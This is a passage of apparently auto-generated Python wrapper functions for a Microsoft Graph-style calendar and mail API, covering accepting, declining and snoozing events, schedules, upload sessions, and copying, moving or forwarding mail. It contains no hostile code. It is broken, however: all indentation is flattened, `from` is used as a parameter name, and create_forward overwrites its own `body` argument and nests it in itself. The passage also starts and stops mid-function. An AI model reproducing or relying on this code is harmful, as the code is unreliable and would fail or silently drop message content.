event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewinstance_tentatively_accept(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarscalendarview_accept(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarscalendarview_decline(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarscalendarview_dismiss_reminder(client,
user_id,
calendar_group_id,
calendar_id,
event_id):
return client.dismiss_reminder(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id)
def usersactions_userscalendargroupscalendarscalendarview_snooze_reminder(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarscalendarview_tentatively_accept(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarseventsattachment_create_upload_session(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarseventscalendar_get_schedule(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarseventsinstance_accept(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarseventsinstance_decline(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarseventsinstance_dismiss_reminder(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendargroupscalendarseventsinstance_snooze_reminder(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarseventsinstance_tentatively_accept(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarsevent_accept(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarsevent_decline(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarsevent_dismiss_reminder(client,
user_id,
calendar_group_id,
calendar_id,
event_id):
return client.dismiss_reminder(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id)
def usersactions_userscalendargroupscalendarsevent_snooze_reminder(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarsevent_tentatively_accept(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendar_get_schedule(client,
user_id,
calendar_group_id,
calendar_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
body=body)
def usersactions_userscalendarscalendarviewattachment_create_upload_session(client,
user_id,
calendar_id,
event_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendarscalendarviewcalendar_get_schedule(client,
user_id,
calendar_id,
event_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendarscalendarviewinstance_accept(client,
user_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarscalendarviewinstance_decline(client,
user_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarscalendarviewinstance_dismiss_reminder(client,
user_id,
calendar_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendarscalendarviewinstance_snooze_reminder(client,
user_id,
calendar_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarscalendarviewinstance_tentatively_accept(client,
user_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarscalendarview_accept(client,
user_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendarscalendarview_decline(client,
user_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendarscalendarview_dismiss_reminder(client,
user_id,
calendar_id,
event_id):
return client.dismiss_reminder(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id)
def usersactions_userscalendarscalendarview_snooze_reminder(client,
user_id,
calendar_id,
event_id,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendarscalendarview_tentatively_accept(client,
user_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendarseventsattachment_create_upload_session(client,
user_id,
calendar_id,
event_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendarseventscalendar_get_schedule(client,
user_id,
calendar_id,
event_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendarseventsinstance_accept(client,
user_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarseventsinstance_decline(client,
user_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarseventsinstance_dismiss_reminder(client,
user_id,
calendar_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendarseventsinstance_snooze_reminder(client,
user_id,
calendar_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarseventsinstance_tentatively_accept(client,
user_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarsevent_accept(client,
user_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendarsevent_decline(client,
user_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendarsevent_dismiss_reminder(client,
user_id,
calendar_id,
event_id):
return client.dismiss_reminder(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id)
def usersactions_userscalendarsevent_snooze_reminder(client,
user_id,
calendar_id,
event_id,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendarsevent_tentatively_accept(client,
user_id,
calendar_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendar_get_schedule(client,
user_id,
calendar_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
calendar_id=calendar_id,
body=body)
def usersactions_userscalendarviewattachment_create_upload_session(client,
user_id,
event_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarviewcalendarview_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewcalendarview_decline(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewcalendarview_dismiss_reminder(client,
user_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendarviewcalendarview_snooze_reminder(client,
user_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewcalendarview_tentatively_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewcalendarevent_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewcalendarevent_decline(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewcalendarevent_dismiss_reminder(client,
user_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendarviewcalendarevent_snooze_reminder(client,
user_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewcalendarevent_tentatively_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewcalendar_get_schedule(client,
user_id,
event_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarviewinstance_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewinstance_decline(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewinstance_dismiss_reminder(client,
user_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendarviewinstance_snooze_reminder(client,
user_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewinstance_tentatively_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarview_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarview_decline(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarview_dismiss_reminder(client,
user_id,
event_id):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id)
def usersactions_userscalendarview_snooze_reminder(client,
user_id,
event_id,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarview_tentatively_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userseventsattachment_create_upload_session(client,
user_id,
event_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userseventscalendarview_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userseventscalendarview_decline(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userseventscalendarview_dismiss_reminder(client,
user_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userseventscalendarview_snooze_reminder(client,
user_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userseventscalendarview_tentatively_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userseventscalendarevent_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userseventscalendarevent_decline(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userseventscalendarevent_dismiss_reminder(client,
user_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userseventscalendarevent_snooze_reminder(client,
user_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userseventscalendarevent_tentatively_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userseventscalendar_get_schedule(client,
user_id,
event_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userseventsinstance_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userseventsinstance_decline(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userseventsinstance_dismiss_reminder(client,
user_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userseventsinstance_snooze_reminder(client,
user_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userseventsinstance_tentatively_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_usersevent_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_usersevent_decline(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_usersevent_dismiss_reminder(client,
user_id,
event_id):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id)
def usersactions_usersevent_snooze_reminder(client,
user_id,
event_id,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_usersevent_tentatively_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_usersmailfolderschildfolder_copy(client,
user_id,
mail_folder_id,
mail_folder_id1,
destination_id=None):
body = {}
if destination_id is not None:
body['destination_id'] = destination_id
return client.copy(user_id=user_id,
mail_folder_id=mail_folder_id,
mail_folder_id1=mail_folder_id1,
body=body)
def usersactions_usersmailfolderschildfolder_move(client,
user_id,
mail_folder_id,
mail_folder_id1,
destination_id=None):
body = {}
if destination_id is not None:
body['destination_id'] = destination_id
return client.move(user_id=user_id,
mail_folder_id=mail_folder_id,
mail_folder_id1=mail_folder_id1,
body=body)
def usersactions_usersmailfoldersmessagesattachment_create_upload_session(client,
user_id,
mail_folder_id,
message_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
mail_folder_id=mail_folder_id,
message_id=message_id,
body=body)
def usersactions_usersmailfoldersmessage_copy(client,
user_id,
mail_folder_id,
message_id,
destination_id=None):
body = {}
if destination_id is not None:
body['destination_id'] = destination_id
return client.copy(user_id=user_id,
mail_folder_id=mail_folder_id,
message_id=message_id,
body=body)
def usersactions_usersmailfoldersmessage_create_forward(client,
user_id,
mail_folder_id,
message_id,
body,
to_recipients=None,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
microsoft_graph_message_to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if to_recipients is not None:
body['to_recipients'] = to_recipients
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
